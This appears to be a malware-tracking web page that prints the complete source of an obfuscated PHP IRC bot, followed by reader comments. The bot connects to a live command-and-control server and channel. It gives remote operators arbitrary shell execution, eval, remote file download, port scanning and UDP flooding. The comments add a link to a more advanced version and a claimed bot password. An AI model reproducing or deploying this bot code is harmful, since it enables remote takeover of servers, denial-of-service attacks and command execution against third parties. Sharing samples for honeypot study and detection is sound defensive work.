Another bot from Tijn
Resolved : [gang.sexpil.net] To [216.224.184.101]
<?php @set_time_limit(0); @error_reporting(0); class HbZheTqekEkqwtqTQ {
var $ttwtzTtWQWwhzbN = array("BbWEWnHeTTwqnNhb"=>"gang.sexpil.net",
"eBwz"=>"23232",
"ZnQWe"=>"scary",
"KqkktZ"=>"13",
"KtWqnhZ"=>"#wWw#",
"tZQ"=>"scan",
"NneBweEZz"=>"41aa15390e2efa34ac693c3bd7cb8e88",
"eWNTTTEhbQ"=>".",
"BbzWWQkbNBb"=>"a87710e60dee7645081a8fc2fab74dbd");
var $users = array();
/* txZET4EZRnuKkWrlW8MjP0M46fREwjEPHtjqoOf51zFbmWn9VZiBQVvM0chmmL2T5c9jQffIFLK */
function yySydpvYj($host)
{
$this->users[$host] = true;
}
function SjSpsYm($msg)
{
fwrite($this->rIiuOioIR,"$msgrn");
}
function aGGAJSAgavgjADGa() {
$chars = 'abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789';
$size = strlen($chars);
for($i=0;$i<$this->ttwtzTtWQWwhzbN['KqkktZ'];$i++) {
$str .= $chars[rand(0,$size-1)];
}
$this->SjSpsYm("NICK ".$str."");
}
function vgdMAdVDmaajYGSap() {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$size = strlen($chars);
for($i=0;$i<6;$i++) {
$str .= $chars[rand(0,$size-1)];
}
if(php_uname() == "") { $uname = "---"; } else { $uname = php_uname(); }
$this->SjSpsYm("USER ".$str."-w 127.0.0.1 localhost :".$uname."");
}
function GjSsPVjJda($to,$msg)
{
$this->SjSpsYm("NOTICE $to :$msg");
}
function jgVjvJpgavSpa()
{
if(!($this->rIiuOioIR = fsockopen($this->ttwtzTtWQWwhzbN['BbWEWnHeTTwqnNhb'],$this->ttwtzTtWQWwhzbN['eBwz'],$e,$s,30)))
$this->jgVjvJpgavSpa();
$this->vgdMAdVDmaajYGSap();
if(strlen($this->ttwtzTtWQWwhzbN['ZnQWe'])>0)
$this->SjSpsYm("PASS ".$this->ttwtzTtWQWwhzbN['ZnQWe']);
$this->aGGAJSAgavgjADGa();
$this->YJpaYmvGmaMGaP();
}
/* SxYRjO0KuL56C8ePkQH3LJ3Vq90ZEBzmZo382UJmvEjXDoCN4aHGKAr0ziQ4KggAuazmV8zgDJ4 */
function yAasajsypAaVjaspdd($host,$packetsize,$time) {
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2UdpFlood Started!2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2UdpFlood Finished!2]: $env MB enviados / Media: $vel MB/s ");
}
function PjavvayGYgyayYAypDG() {
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "�034ON�03"; }
else { $safemode = "�039OFF�03"; }
$unme = php_uname();
if($unme == "") { $mname = "�0315---�03"; }
else { $mname = "�0315".$unme."�03"; }
$url = "�0315http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."�03";
$pth = "�0315".getcwd()."�03";
$pthh = getcwd()."";
$perms = fileperms("$pthh");
if (($perms & 0xC000) == 0xC000) { $info = 's';
} elseif (($perms & 0xA000) == 0xA000) { $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) { $info = '-';
} elseif (($perms & 0x6000) == 0x6000) { $info = 'b';
} elseif (($perms & 0x4000) == 0x4000) { $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) { $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) { $info = 'p';
} else { $info = 'u'; }
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
$rghts = "�0315".$info."�03";
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"�0314[SAFE:�032 $safemode2�0314]�0315 $url �0314[pwd:]�0315 $pth �0314(�03$rghts�0314) [uname:]�0315 $mname");
}
function YyajayjSaggv($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function AvYSAY($chan,$key=NULL)
{
$this->SjSpsYm("JOIN $chan $key");
}
function dgdvYYGG($host)
{
unset($this->users[$host]);
}
function YJpaYmvGmaMGaP()
{
while(!feof($this->rIiuOioIR))
{
$this->buf = trim(fgets($this->rIiuOioIR,512));
$EqqHQNKwKkzHW = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->SjSpsYm("PONG :".substr($this->buf,6));
}
if(isset($EqqHQNKwKkzHW[1]) && $EqqHQNKwKkzHW[1] =="004")
{
$this->SjSpsYm("MODE ".$this->nick." ".$this->ttwtzTtWQWwhzbN['']);
$this->SjSpsYm("JOIN ".$this->ttwtzTtWQWwhzbN['KtWqnhZ']." ".$this->ttwtzTtWQWwhzbN['tZQ']."");
$this->AvYSAY($this->ttwtzTtWQWwhzbN['KtWqnhZ'],$this->ttwtzTtWQWwhzbN['tZQ']);
$this->PjavvayGYgyayYAypDG();
}
if(isset($EqqHQNKwKkzHW[1]) && $EqqHQNKwKkzHW[1]=="433")
{
$this->aGGAJSAgavgjADGa();
}
/* 6XxKRxho7IFY8OF2pL9P5afiVeI2HiWE5keNIl1FTxuRcZKsBJ8xKdFvhenPmajilnWTzOpicK0 */
if($this->buf != $old_buf)
{
$tzNWEQKhTkbNbk = array();
$OOL = substr(strstr($this->buf," :"),2);
$Rrci = explode(" ",$OOL);
$XUULo = explode("!",$EqqHQNKwKkzHW[0]);
$FUOlRi = explode("@",$XUULo[1]);
$FUOlRi = $FUOlRi[1];
$XUULo = substr($XUULo[0],1);
$IFfouOu = $EqqHQNKwKkzHW[0];
if($Rrci[0]==$this->XUULo)
{
for($i=0;$i<count($Rrci);$i++)
$tzNWEQKhTkbNbk[$i] = $Rrci[$i+1];
}
else
{
for($i=0;$i<count($Rrci);$i++)
$tzNWEQKhTkbNbk[$i] = $Rrci[$i];
}
if(count($EqqHQNKwKkzHW)>2)
{
switch($EqqHQNKwKkzHW[1])
{
case "QUIT":
if($this->YyajayjSaggv($IFfouOu))
{
$this->dgdvYYGG($IFfouOu);
}
break;
case "PART":
if($this->YyajayjSaggv($IFfouOu))
{
$this->dgdvYYGG($IFfouOu);
}
break;
case "PRIVMSG":
if(!$this->YyajayjSaggv($IFfouOu) && (md5($FUOlRi) == $this->ttwtzTtWQWwhzbN['BbzWWQkbNBb'] || $this->ttwtzTtWQWwhzbN['BbzWWQkbNBb'] == "*"))
{
if(substr($tzNWEQKhTkbNbk[0],0,1)==$this->ttwtzTtWQWwhzbN['eWNTTTEhbQ'])
{
switch(substr($tzNWEQKhTkbNbk[0],1))
{
case "user":
if(md5($tzNWEQKhTkbNbk[1])==$this->ttwtzTtWQWwhzbN['NneBweEZz'])
{
$this->yySydpvYj($IFfouOu);
}
else
{
$this->GjSsPVjJda($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2Auth2]: Foute password $XUULo idioot!!");
}
break;
}
}
}
/* ezBw1buoLyT6FYkkaltjwH5g6JvfL56QvxdmyyA9Wk6s9hC9sWjPueVqOgwqcs6xQaKfyaeklbC */
elseif($this->YyajayjSaggv($IFfouOu))
{
if(substr($tzNWEQKhTkbNbk[0],0,1)==$this->ttwtzTtWQWwhzbN['eWNTTTEhbQ'])
{
switch(substr($tzNWEQKhTkbNbk[0],1))
{
case "passthru":
$command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1);
$exec = passthru($command);
$ret = explode("n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ']," : ".trim($ret[$i]));
break;
case "die":
$this->SjSpsYm("QUIT :die command from $XUULo");
fclose($this->rIiuOioIR);
exit;
case "udpflood":
if(count($tzNWEQKhTkbNbk)>3)
{
$this->yAasajsypAaVjaspdd($tzNWEQKhTkbNbk[1],$tzNWEQKhTkbNbk[2],$tzNWEQKhTkbNbk[3]);
}
break;
case "pscan":
if(count($tzNWEQKhTkbNbk) > 2)
{
if(fsockopen($tzNWEQKhTkbNbk[1],$tzNWEQKhTkbNbk[2],$e,$s,15))
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2pscan2]: ".$tzNWEQKhTkbNbk[1].":".$tzNWEQKhTkbNbk[2]." is 2open2");
else
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2pscan2]: ".$tzNWEQKhTkbNbk[1].":".$tzNWEQKhTkbNbk[2]." is 2closed2");
}
break;
case "info":
$this->PjavvayGYgyayYAypDG();
break;
case "exec":
$command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1);
$exec = exec($command);
$ret = explode("n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ']," : ".trim($ret[$i]));
break;
case "logout":
$this->dgdvYYGG($IFfouOu);
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[auth:]�0314 Je bent nu uitgelogt $XUULo");
break;
case "dns":
if(isset($tzNWEQKhTkbNbk[1]))
{
$ip = explode(".",$tzNWEQKhTkbNbk[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2dns2]: ".$tzNWEQKhTkbNbk[1]." => ".gethostbyaddr($tzNWEQKhTkbNbk[1]));
}
else
{
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2dns2]: ".$tzNWEQKhTkbNbk[1]." => ".gethostbyname($tzNWEQKhTkbNbk[1]));
}
}
break;
case "restart":
$this->SjSpsYm("QUIT :gerestart door $XUULo");
fclose($this->rIiuOioIR);
$this->jgVjvJpgavSpa();
break;
case "download":
if(count($tzNWEQKhTkbNbk) > 2)
{
if(!$fp = fopen($tzNWEQKhTkbNbk[2],"w"))
{
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[download:]�0314 Kon bestand niet downloaden. Toestemming geweigerd.");
}
else
{
if(!$get = file($tzNWEQKhTkbNbk[1]))
{
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[download:]�0314 Kan bestand 2".$tzNWEQKhTkbNbk[1]."2 niet downloaden.");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[download:]�0314 Bestand 2".$tzNWEQKhTkbNbk[1]."2 gedownload naar 2".$tzNWEQKhTkbNbk[2]."2");
}
fclose($fp);
}
}
else { $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[download:]�0314 Typ ".download http://your.host/file /tmp/file""); }
break;
case "sexec":
$command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1);
$exec = shell_exec($command);
$ret = explode("n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ']," : ".trim($ret[$i]));
break;
case "eval":
$eval = eval(substr(strstr($OOL,$tzNWEQKhTkbNbk[1]),strlen($tzNWEQKhTkbNbk[1])));
break;
case "raw":
$this->SjSpsYm(strstr($OOL,$tzNWEQKhTkbNbk[1]));
break;
case "system":
$command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1);
$exec = system($command);
$ret = explode("n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ']," : ".trim($ret[$i]));
break;
case "rndnick":
$this->aGGAJSAgavgjADGa();
break;
case "popen":
if(isset($tzNWEQKhTkbNbk[1]))
{
$command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1);
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2popen2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ']," : $pbuf");
}
pclose($pipe);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->jgVjvJpgavSpa();
}
function mvppvYGyYVS($to,$msg)
{
$this->SjSpsYm("PRIVMSG $to :$msg");
}
}
$lcuXcFOO = new HbZheTqekEkqwtqTQ;
$lcuXcFOO->jgVjvJpgavSpa(); ?>
hosting infos:
http://whois.domaintools.com/216.224.184.101
makaveli - May 11, 2012 at 2:06 pm
Heyy what can we do with this ? just warning about site web ?
Pig - May 11, 2012 at 5:28 pm
all u can do is learning something if u feel ready for it
Anonymous - May 12, 2012 at 1:07 am
I've gotten several copies of this bot on my honeypot. When I saw it, I laughed since they tried obfuscating the code but basically just changed the damn functions name.
REAL SECURE DAWGS!
Btw, they use some super duper hax0r3d ircd with barely any info provided to non-admin users.
makaveli - May 12, 2012 at 9:23 am
@pig thank's mate, but it is php code right ? what do this code ?
Pig - May 12, 2012 at 3:21 pm
makaveli u can do portscan, ddos, download files and much more
just read the source
Anonymous - May 12, 2012 at 7:41 pm
It's just like any other version of pbot. The function names have just been renamed.
Pig - May 12, 2012 at 8:33 pm
this is more advanced from same guy
http://hpaste.org/68434
1x33x7 - June 15, 2012 at 7:41 am
HeHe,
the password for the pbots is "p0w3r" without the ""
much fun 🙂
MFG
1x33x7
1x33x7 - June 15, 2012 at 7:43 am
pass is p0w3r for the pbots 😀